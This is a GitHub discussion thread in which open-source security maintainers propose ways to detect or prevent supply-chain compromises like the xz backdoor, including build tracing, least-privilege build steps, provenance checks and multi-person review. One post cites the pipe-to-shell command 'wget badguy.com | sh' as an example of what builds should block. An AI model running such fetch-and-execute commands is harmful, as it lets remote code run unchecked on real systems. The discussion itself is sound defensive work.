From a technical perspective, are there any options available to projects & maintainers to detect or avoid situations like the recent xz compromise? #143

SecurityCRob · 2024-04-03T17:30:12Z

SecurityCRob
Apr 3, 2024
Maintainer

This goes hand-in-hand with an Issue the WG is creating to identify and advocate for means developers can take to protect themselves from social engineering and bullying as exemplified in the attack pattern (https://boehs.org/node/everything-i-know-about-the-xz-backdoor) - Vuln WG Issue - #142

What tools, technologies, or processes are available (or that could be written) that could help maintainers and persons involved in the downstream supply chain help identify and prevent this style of attack?

scovetta · 2024-04-03T17:43:23Z

scovetta
Apr 3, 2024

Discourage the use of binary test cases -- instead, the repo should have scripts that generate those test case binaries when they're needed. Opaque binaries are very difficult to reason about.

Doesn't cover all cases -- e.g. images, static data files, etc.

2 replies

david-a-wheeler Apr 9, 2024
Maintainer

However, it's often the case that you need to test with data.

scovetta Apr 9, 2024

Yep, I was thinking about the difference between magical "trust me" binaries that show up in a repo vs. ones that can be reasoned over. E.g. <gzip up the string "the quick brown fox..." and then add in 100 null characters at the end> in a shell script, or even <add 100 PRNG bytes generated by repeatedly hashing "the quick brown fox..."> -- etc. Something easily reproducible.

scovetta · 2024-04-03T18:20:12Z

scovetta
Apr 3, 2024

A heuristic of "high risk change" vs "low risk change" might be helpful based on the content of the PR and perhaps the historical contributions from the committer -- e.g. "I see you only make typo fixes in JavaScript but now you just tweaked the memory allocator in this low level driver code".

Related, when a high risk change in a critical project is identified, either manually by perhaps tagging the issue, or through a PR scanner, that kind of signal could be sent out to a paid team of security professionals to review it.

0 replies

scovetta · 2024-04-04T19:12:05Z

scovetta
Apr 4, 2024

How about tracing the build/compilation process to see which files/resources get read?

root@4b1abd130736:/usr/src/app/a# strace -f -ttt gcc a.c 2>&1 | grep openat | grep RDONLY
1712257871.759524 openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
1712257871.759796 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
[pid   302] 1712257871.768089 openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid   302] 1712257871.768336 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libisl.so.23", O_RDONLY|O_CLOEXEC) = 3
[pid   302] 1712257871.768876 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libmpc.so.3", O_RDONLY|O_CLOEXEC) = 3
[pid   302] 1712257871.769357 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libmpfr.so.6", O_RDONLY|O_CLOEXEC) = 3
[pid   302] 1712257871.769837 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgmp.so.10", O_RDONLY|O_CLOEXEC) = 3
[pid   302] 1712257871.770309 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libz.so.1", O_RDONLY|O_CLOEXEC) = 3
[pid   302] 1712257871.770840 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libzstd.so.1", O_RDONLY|O_CLOEXEC) = 3
[pid   302] 1712257871.771388 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
[pid   302] 1712257871.779532 openat(AT_FDCWD, "a.c", O_RDONLY|O_NOCTTY) = 3
[pid   302] 1712257871.788136 openat(AT_FDCWD, "/usr/lib/gcc/x86_64-linux-gnu/11/include/stdc-predef.h", O_RDONLY|O_NOCTTY) = -1 ENOENT (No such file or directory)
[pid   302] 1712257871.788501 openat(AT_FDCWD, "/usr/local/include/stdc-predef.h", O_RDONLY|O_NOCTTY) = -1 ENOENT (No such file or directory)
[pid   302] 1712257871.788903 openat(AT_FDCWD, "/usr/include/x86_64-linux-gnu/stdc-predef.h", O_RDONLY|O_NOCTTY) = -1 ENOENT (No such file or directory)
[pid   302] 1712257871.789170 openat(AT_FDCWD, "/usr/include/stdc-predef.h", O_RDONLY|O_NOCTTY) = 4
[pid   303] 1712257871.803299 openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid   303] 1712257871.803472 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libopcodes-2.38-system.so", O_RDONLY|O_CLOEXEC) = 3
[pid   303] 1712257871.803832 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libbfd-2.38-system.so", O_RDONLY|O_CLOEXEC) = 3
[pid   303] 1712257871.804217 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libz.so.1", O_RDONLY|O_CLOEXEC) = 3
[pid   303] 1712257871.804601 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
[pid   303] 1712257871.809157 openat(AT_FDCWD, "/tmp/ccrZnN5z.s", O_RDONLY) = 4
[pid   304] 1712257871.815401 openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid   304] 1712257871.815573 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
[pid   305] 1712257871.824577 openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
[pid   305] 1712257871.824726 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libbfd-2.38-system.so", O_RDONLY|O_CLOEXEC) = 3
[pid   305] 1712257871.825058 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libctf.so.0", O_RDONLY|O_CLOEXEC) = 3
[pid   305] 1712257871.825345 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
[pid   305] 1712257871.825842 openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libz.so.1", O_RDONLY|O_CLOEXEC) = 3
[pid   305] 1712257871.827344 openat(AT_FDCWD, "/usr/lib/gcc/x86_64-linux-gnu/11/liblto_plugin.so", O_RDONLY|O_CLOEXEC) = 3
[pid   305] 1712257871.830308 openat(AT_FDCWD, "/usr/lib/gcc/x86_64-linux-gnu/11/../../../x86_64-linux-gnu/Scrt1.o", O_RDONLY) = 4
[pid   305] 1712257871.830765 openat(AT_FDCWD, "/usr/lib/gcc/x86_64-linux-gnu/11/../../../x86_64-linux-gnu/Scrt1.o", O_RDONLY) = 5
[pid   305] 1712257871.831540 openat(AT_FDCWD, "/usr/lib/gcc/x86_64-linux-gnu/11/../../../x86_64-linux-gnu/crti.o", O_RDONLY) = 5
[pid   305] 1712257871.832151 openat(AT_FDCWD, "/usr/lib/gcc/x86_64-linux-gnu/11/../../../x86_64-linux-gnu/crti.o", O_RDONLY) = 6
[pid   305] 1712257871.832718 openat(AT_FDCWD, "/usr/lib/gcc/x86_64-linux-gnu/11/crtbeginS.o", O_RDONLY) = 6
[pid   305] 1712257871.833135 openat(AT_FDCWD, "/usr/lib/gcc/x86_64-linux-gnu/11/crtbeginS.o", O_RDONLY) = 7
[pid   305] 1712257871.833704 openat(AT_FDCWD, "/tmp/ccyjABby.o", O_RDONLY) = 7
[pid   305] 1712257871.834148 openat(AT_FDCWD, "/tmp/ccyjABby.o", O_RDONLY) = 8
[pid   305] 1712257871.834721 openat(AT_FDCWD, "/usr/lib/gcc/x86_64-linux-gnu/11/libgcc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
[pid   305] 1712257871.834820 openat(AT_FDCWD, "/usr/lib/gcc/x86_64-linux-gnu/11/libgcc.a", O_RDONLY) = 8
[pid   305] 1712257871.835706 openat(AT_FDCWD, "/usr/lib/gcc/x86_64-linux-gnu/11/libgcc_s.so", O_RDONLY) = 10
[pid   305] 1712257871.837425 openat(AT_FDCWD, "/usr/lib/gcc/x86_64-linux-gnu/11/libgcc_s.so", O_RDONLY) = 12
[pid   305] 1712257871.837647 openat(AT_FDCWD, "/usr/lib/gcc/x86_64-linux-gnu/11/libgcc_s.so", O_RDONLY) = 12
[pid   305] 1712257871.841067 openat(AT_FDCWD, "/usr/lib/gcc/x86_64-linux-gnu/11/libgcc_s.so", O_RDONLY) = 10
...

2 replies

david-a-wheeler Apr 12, 2024
Maintainer

How about doing a trace and forcing a public, non-forgeable answer of what changed? In particular, I would want to know what changed during the build. A long mindless report is just that, but the diffs ("what's changed"?) could be far more illuminating.

colek42 Apr 13, 2024

You can do this with in-toto Witness

david-a-wheeler · 2024-04-11T21:27:12Z

david-a-wheeler
Apr 11, 2024
Maintainer

Here are some xz backdoor (CVE-2024-3094) notes.

There are MANY sources of info about the backdoor in versions 5.6.0 and 5.6.1 of the XZ compression utility and library (CVE-2024-3094). It targeted OpenSSH. Andres Freund discovered the backdoor by noticing that failed SSH logins were taking a lot of CPU time while doing some micro-benchmarking, and tracking down the backdoor from there. It was introduced by XZ co-maintainer "Jia Tan".

Here are some places where more details can be found:
https://lwn.net/Articles/967192/
https://openssf.org/blog/2024/03/30/xz-backdoor-cve-2024-3094/
https://www.openwall.com/lists/oss-security/2024/03/29/4

Here I’ll quickly brainstorm some approaches that MIGHT have helped, with some possible pros and cons. I’m not necessarily advocating for them, since some have some serious negatives, but maybe they’ll spawn good ideas.

Don’t GENERATE tarballs or their contents (e.g., configure)

The attack hid in a file that was putatively generated by autoconf, but wasn’t. Autoconf was from a time when people generated tarballs with stuff in them. At the time, you couldn’t be sure the recipient would be able to get all the necessary build tools. That’s not usually a problem today. Instead, you could distribute source tarballs that are strictly copies of a version from a version control system, and since the latter are what people review, that would make sense.

This is a big change from how autoconf was originally intended to be used, but it’s not that hard to change. This would mean that to build, you’d need to have autotools installed and its build first step (when building the package) would be “autoreconf” (which calls the right tools in the right order).

You could verify that what you received is what was stored in the source repo, which is an easy check once nothing is generated. Bonus points if we could make archives reproducible. Currently an archive (tarball, zip, etc.) can have its bits change without a change in its contents.

Verify or ignore generated files in tarballs

You could also forcibly regenerate (e.g., with autoreconf) files that were supposedly generated.

Least privilege during prep, build, and test

It’d be possible to build systems that greatly reduce privileges. E.g.:

A pre-build step, that’s allowed to download various necessary files/programs (e.g., compiler, etc.). It should be only allowed to download from specified authorized places, instead of “wget badguy.com | sh”. Eliminating wget/curl of scripts would be good, since otherwise no one knows what went in, though that’s another whole argument (hi Rust!).
A build step. This shouldn’t be allowed to download anything, or read/write tests.
A test step. This shouldn’t be allowed to modify source code or executable programs.

Forbid/Warn on embedded binary files

Scorecard already ranks these as risks.

That said, there are many cases where test cases legitimately need binary files as tests. This is harder to pull off broadly.

Least privilege on link

It’s really unusual for one program to need to modify the link-time processing of another. Can we disable that, at least in many cases, and require a separate permission to grant it that an attacker can’t manipulate?

As I noted here:
https://dwheeler.com/secure-programs/Secure-Programs-HOWTO/dlls.html
some dynamic mechanisms are disabled when the underlying library determines it’s setuid/setgid, or has elevated privileges. We could probably go further.

Developers knowing developers

Nobody knows who the attacker is (likely a team). I don’t think people need to give up privacy just to contribute code. However, I think it’s important for either (1) the other co-maintainers know & have met the maintainer, or (2) treat the anonymous maintainer with greater suspicion, or ideally (3) both.

Multi-person review

Part of the problem here was that an overworked maintainer was bullied into accepting another maintainer. If every change was reviewed by multiple people before acceptance, and it was KNOWN that they were different people, this would not have worked. Sure, you can have multiple malicious parties, but that is harder.

Other ideas?

I'm sure there are other ideas. It'd be wise to discuss how to make these kinds of attacks harder to perform.

0 replies

karianna · 2024-04-11T23:22:33Z

karianna
Apr 11, 2024

It did get caught due to the 2nd order effect of a performance regression. I know I'll be looking more closely at our regression test suites around Go and OpenJDK and asking the author "I see a difference of X here, let's look at the likely root cause of that"

0 replies

david-a-wheeler · 2024-04-12T19:57:11Z

david-a-wheeler
Apr 12, 2024
Maintainer

Identify the top OSS projects (especially with solo maintainers) and fund added work/review of changes

It's obviously not possible to serious fund "all OSS projects". But focusing on the "most important ones" is plausible. That's the premise of the OpenSSF Securing Critical Projects Working Group. In the case of xz, we did have specific warning: a report I wrote in 2015.

In 2015 I was the lead author of the report "Open Source Software Projects Needing Security Investments", which was funded by the Linux Foundation. The goal was to do a relatively quick analysis to determine what the "most important OSS" was. We agreed to focus on packages in Linux distributions (specifically Debian). I just double-checked; xz-utils was specifically listed as one of the riskiest, because it is a very widely used compression algorithm. Quick note: it's colloquially often referred to as "Census I" but that title never occurs in the paper; the name was applied after-the-fact due to the later "Census II" work by Harvard on language-level packages. You can get the 2015 paper here: https://www.ida.org/-/media/feature/publications/o/op/open-source-software-projects-needing-security-investments/d-5459.ashx or https://github.com/coreinfrastructure/census/blob/master/OSS-2015-06-19.pdf (on the latter click on "download").

Load at run-time only what you need (e.g., dlopen)

A useful countermeasure is to only load software when you need to use it. This can (depending on details) significantly reduce the number of systems affected by some specific attack.

The systemd folks have been exploring this: "A while back we started to turn many of the library dependencies of systemd from regular ELF dependencies (which you can explore with tools like lddtree or readelf -d … | grep NEEDED) into dlopen() deps, in order to minimize the dep footprint of systemd.".

This potentially reduces the number of systems that are vulnerable. If the software isn't normally loaded and the attacker can't trigger its loading, the system won't be exploitable even if technically the vulnerability exists in storage. In theory this could reduce the size of memory/disk use, though since many systems today page memory in & out, that effect is less significant than it would have been in old systems.

One disadvantage when switching from ELF dependencies to dlopen() dependencies is that this suddenly makes makes many dependencies nearly invisible to other tools. The systemd folks have a nice solution for this: they propose creating a new ELF section that would record this information. That way, tools can get this dependency information easily. See: systemd/systemd#32234

Bonus points if dlopen() is rigged to only allow opening those files if there was a corresponding ELF section that recorded that they are dependencies. This would suddenly mean that you have to create an approvelist of libraries that can be dlopen'ed.

More information:
https://mastodon.social/@pid_eins/112256363180973672
systemd/systemd#32234
https://news.ycombinator.com/item?id=40014724

0 replies

colek42 · 2024-04-13T17:12:21Z

colek42
Apr 13, 2024

Create linked provenance documents with in-Toto and check it with a layout. Https://GitHub.com/in-toto/witness is a great tool for this. Full disclosure I am a maintainer, and on the in-toto steering committee.

0 replies

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

From a technical perspective, are there any options available to projects & maintainers to detect or avoid situations like the recent xz compromise? #143

{{title}}

Replies: 7 comments 4 replies

{{title}}

{{title}}

{{title}}

{{title}}

{{editor}}'s edit

{{editor}}'s edit

{{title}}

{{title}}

{{title}}

{{title}}

{{editor}}'s edit

{{editor}}'s edit

{{title}}

{{title}}

{{title}}

Select a reply

From a technical perspective, are there any options available to projects & maintainers to detect or avoid situations like the recent xz compromise? #143

SecurityCRob Apr 3, 2024 Maintainer

Replies: 7 comments · 4 replies

scovetta Apr 3, 2024

david-a-wheeler Apr 9, 2024 Maintainer

scovetta Apr 9, 2024

scovetta Apr 3, 2024

scovetta Apr 4, 2024

david-a-wheeler Apr 12, 2024 Maintainer

colek42 Apr 13, 2024

david-a-wheeler Apr 11, 2024 Maintainer

Don’t GENERATE tarballs or their contents (e.g., configure)

Verify or ignore generated files in tarballs

Least privilege during prep, build, and test

Forbid/Warn on embedded binary files

Least privilege on link

Developers knowing developers

Multi-person review

Other ideas?

karianna Apr 11, 2024

david-a-wheeler Apr 12, 2024 Maintainer

Identify the top OSS projects (especially with solo maintainers) and fund added work/review of changes

Load at run-time only what you need (e.g., dlopen)

colek42 Apr 13, 2024

SecurityCRob
Apr 3, 2024
Maintainer

Replies: 7 comments 4 replies

scovetta
Apr 3, 2024

david-a-wheeler Apr 9, 2024
Maintainer

scovetta
Apr 3, 2024

scovetta
Apr 4, 2024

david-a-wheeler Apr 12, 2024
Maintainer

david-a-wheeler
Apr 11, 2024
Maintainer

karianna
Apr 11, 2024

david-a-wheeler
Apr 12, 2024
Maintainer

colek42
Apr 13, 2024